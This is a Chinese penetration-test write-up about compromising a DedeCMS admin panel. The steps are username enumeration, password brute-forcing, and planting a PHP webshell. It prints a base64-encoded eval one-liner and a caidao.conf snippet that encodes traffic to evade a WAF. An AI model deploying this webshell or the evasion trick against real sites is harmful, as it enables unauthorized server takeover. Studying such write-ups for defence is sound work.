记一次织梦cms渗透测试

最新推荐文章于 2024-05-01 12:00:00 发布
最新推荐文章于 2024-05-01 12:00:00 发布
阅读量1.1k 收藏 2
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/0nth3way/p/11322541.html
版权

记一次织梦cms渗透测试

 

0x01 前言

本次测试的整个流程:枚举用户名  -  针对性暴破  -  登录后台  -  后台编辑php文件getshell。

0x02 过程

1、登录功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名

 

2、登录功能模块无验证码,通过枚举出的用户名暴力破解出相应密码。并登录后台(dedecms v57)

 

3、开始遇到坑了。文件式管理器上传文件和新增广告等方式都无法getshell(貌似有waf)。一有动作,连接就会重置。

 

4、尝试直接编辑原有文件,将代码写入。

(1)写入phpinfo();可以成功

 

(2)写入常规一句话也能成功,但是执行时,连接会被重置

(3)写入base64编码一句话<?php @eval(base64_decode($_POST[‘0nth3way’]));?>,将数据编码后就可以成功执行了

5、菜刀修改配置文件caidao.conf如下,便可连接一句话木马。

<PHP_BASE>
ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s
</PHP_BASE>

 

6、菜刀成功连上一句话。权限:IIS用户

 

7、看到一个名为wkds.exe的进程,感觉是防护软件,没有深究。

8、第二天就凉了。

(1)马子还在,菜刀连不上了。能执行phpinfo();,不能执行system(‘whoami’),查看phpinfo也没有禁用相关函数啊。问号脸???求解答0.0

 

(2)后台也无法编辑文件了

0x03 后记

本此测试get到几点:

(1)流量数据可编码绕过waf,菜刀改配置连接。

(2)及时行乐

转载于:https://www.cnblogs.com/0nth3way/p/11322541.html

weixin_30776545
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4291
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
Web渗透学习-织梦CMS-RFI
Garfy's Blog
07-09 1589
今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI(远程文件包含)。 织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。 大致可以分为三步: 1.清空/data/config_update.php中的信息。 http://127.0.0.1/install
渗透实战:dedeCMS任意用户密码重置到内网getshell
最新发布
wangluoanquan111的博客
05-01 586
DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。
渗透测试-地基篇-Webshell-织梦dedecms框架(八)
qq_34801745的博客
11-25 1484
** 渗透测试-地基篇-Webshell-织梦dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔,在录地基笔中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
熊海cms渗透测试
m0_64583632的博客
11-10 2152
熊海cms渗透测试
极致CMS 1.7 审计与渗透测试
feng的博客
04-04 1772
前言 几天前在先知上看到了Firebasky师傅在先知上发的关于极致CMS渗透测试。这个CMS的洞虽然已经公布了很久,但是因为自己还是太菜,基本上没有怎么接触过多少CMS,因此就从网上把极致CMS下载了下来,在本地搭建了一下环境来测试。 github上的极致CMS 这里我下载的是1.7版本,考虑到1.9版本可能大多数的洞都修了,就不好玩了,先把1.7试一遍,再搭一下1.9版本的看看。这篇文章相对来说会很乱,因为行文的思路是我随手乱试思路了。 后台上传文件 本地搭建一下,设置一下管理员账号和密码,直接自己登
织梦cms 技术导航网站源码附带一万数据
08-20
织梦CMS(DedeCMS)是一款广泛应用于网站建设的开源内容管理系统,它以其强大的模板引擎和易用性赢得了众多用户的喜爱。本技术导航网站源码包含了完整的织梦CMS框架,并附带了一万条预填充的数据,这使得用户可以...
织梦cms手机生成静态页插件_织梦cms手机生成静态页插件_
09-29
织梦CMS(DedeCMS)是一款广泛使用的开源内容管理系统,尤其在中国国内,它因其易用性和灵活性而受到许多网站管理员的青睐。手机生成静态页插件是针对织梦CMS的一个重要扩展,它允许用户为移动设备自动生成优化的...
摘自织梦CMS中的图片处理类
10-23
织梦内容管理系统(DedeCMS)是一个基于PHP和MySQL的开源CMS系统,它提供了丰富的网站建设和管理功能,包括文章发布、栏目管理、模板设计等。在这个系统中,开发者可以方便地进行网站的搭建和维护。 2. **图片处理...
织梦Cms百度小程序插件源码
03-30
织梦CMS(DedeCMS)是一款广泛使用的开源内容管理系统,专为网站建设和管理设计。而“百度小程序”是百度推出的轻量化应用平台,允许开发者在百度搜索引擎和生态系统内创建交互式、无需下载安装的应用程序。将这两者...
织梦CMS二次开发手册
07-10
它的二次开发手册是为开发者提供的一份重要参考资料,旨在帮助他们深入理解织梦CMS的内部机制,从而进行个性化定制和功能扩展。 在“织梦CMS二次开发手册”中,主要涵盖了以下几个核心知识点: 1. **织梦CMS架构**...
渗透测试全过程
12-04
我先感慨一下,在做网络安全这些年感觉一直在漂,从05年刚到北京的远东到08年的大连,再到11年的启明,没有一个地方能让人感到是在踏实的做安全,对网络安全人才这块也都不重视。从圈内群的好友里得知,有很多技术水平很不错的朋友都闲置在家,为什么?我感觉国内的大环境都是这样的,所以出现了2011年底的各大网站密码泄露事件。我认为,泄露的那些库也只是九牛之一毛。在这个拿网络安全人才当民工的时代,也许这个事件算是给那些高傲的、高薪的程序员上的一堂课吧。
网站渗透测试报告
02-20
与系统没有对用户的操作做唯一标识,如果攻击者欺骗用户访问恶意构造的页面,此时攻击者就可以劫持用户的会话数据发出非故意的HTTP请求,如修改用户的口令等恶意操作
XSS攻击织梦门户网站--一次基础的攻击练习(不玩赖的了-.-)
weixin_38628400的博客
05-25 725
1攻击点寻找 标题和内容中反复插入大量XSS攻击测试语句,在网站前台均无反应 不断从不同角度试探,发现只有在管理端修改完文章的标题后,点击标题名称时,会弹出对应的语句,也就是代表当管理员点击这个位置的时候,可以通过XSS进行各种攻击,发现攻击点!! 2攻击展开 xss攻击中的hook(钩子)服务需要用到beef-xss工具,beef-xss工具依赖kail(linux的一种)系统 kail系统安装参考以下链接 https://blog.csdn.net/dajnaj/article/details/1214
1、渗透测试环境准备之phpstudy与dedecms搭建
songling515010475的专栏
04-13 966
1.phpstudy官网地址https://www.xp.cn/download.html,下载后一键安装。 2.dedecms官网地址http://www.dedecms.com/我这里下载的是DedeCMS V5.7 SP2正式版 UTF-8的版本。 3.解压dedecms后,把upload下的所有文件复制到phpstudy网站目录下,phpstudy默认网站目录为,D:...
最新系统漏洞--Fiyo CMS跨站脚本漏洞
weixin_48555088的博客
11-24 988
最新系统漏洞2021年11月24日 受影响系统: Fiyo CMS Fiyo CMS 2.0.6.1 描述: Fiyo CMS是一个内容管理系统。 Fiyo CMS 2.0.6.1版本的“tag”参数存在跨站脚本漏洞。未经认证的攻击者可利用该漏洞发起跨站脚本攻击。 <**> 建议: 厂商补丁: Fiyo CMS 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: https://github.com/FiyoCMS ...
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 5434
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
浅谈dede织梦网站安全设置如何防黑客攻击安全
weixin_43213795的博客
09-29 186
今天打开网站发现首页出现很多乱码,想肯定是被攻击了,然后打开服务器一点点排查,发现入侵了不少文件,因为这些文件都是近期被修改的,检测了几个重要的文件夹,如data,include,plus等,参考官方源程序发现多了些特殊文件,删除即可.下面针对dede织梦网站安全设置谈谈我的个人经验: 1、打补丁 多关注织梦官方最新发布的补丁信息,及时打上,一些黑客就是利用这些漏洞进行网站的攻击. 2、 改...
网站渗透测试,看这篇就够了
zhangge3663的博客
07-24 2005
一、信息收集 1.获取域名的whois信息,获取注册者邮箱姓名电话等。 2.查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3.查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。 4.查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如rsync,心脏出血,mysql,ftp,ssh弱口令等。 5.扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄露,比如php探针。 6
织梦cms手机页怎么生成
02-01
要生成织梦CMS的手机页,需要进行以下步骤: 1. 安装织梦CMS模板:首先,确保你的织梦CMS系统已经安装好,并且你已经选择了一个适用于手机页的模板。将该模板上传至网站的templets目录下。 2. 创建手机页模板:进入织梦CMS的后台管理界面,点击“模板”菜单,然后选择“管理模板”。点击“新增”按钮,然后输入模板名称,如“手机页模板”。点击“确定”按钮创建模板。 3. 设计手机页模板:在模板管理界面,找到刚才创建的手机页模板,并点击“编辑”按钮。在模板编辑界面,通过HTML、CSS和JavaScript来设计你想要的手机页布局和样式。 4. 生成手机页:完成设计后,点击手机页模板编辑界面的“生成手机页”按钮。系统将自动生成手机页,并保存到网站的templets目录下的m目录中。 5. 配置手机页:点击“系统”菜单,然后选择“手机”,再点击“自定义静态手机页”按钮。在弹出的界面中,选择生成的手机页模板和对应的栏目。点击“确定”按钮保存配置。 6. 查看手机页:在手机浏览器中输入你的网站地址,系统将自动识别设备类型,如果是手机设备,将会显示生成的手机页。 请注意,以上步骤仅针对织梦CMS系统中自带的手机页生成功能。如果你想要更加个性化的手机页,你可以通过第三方插件或自定义开发来实现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值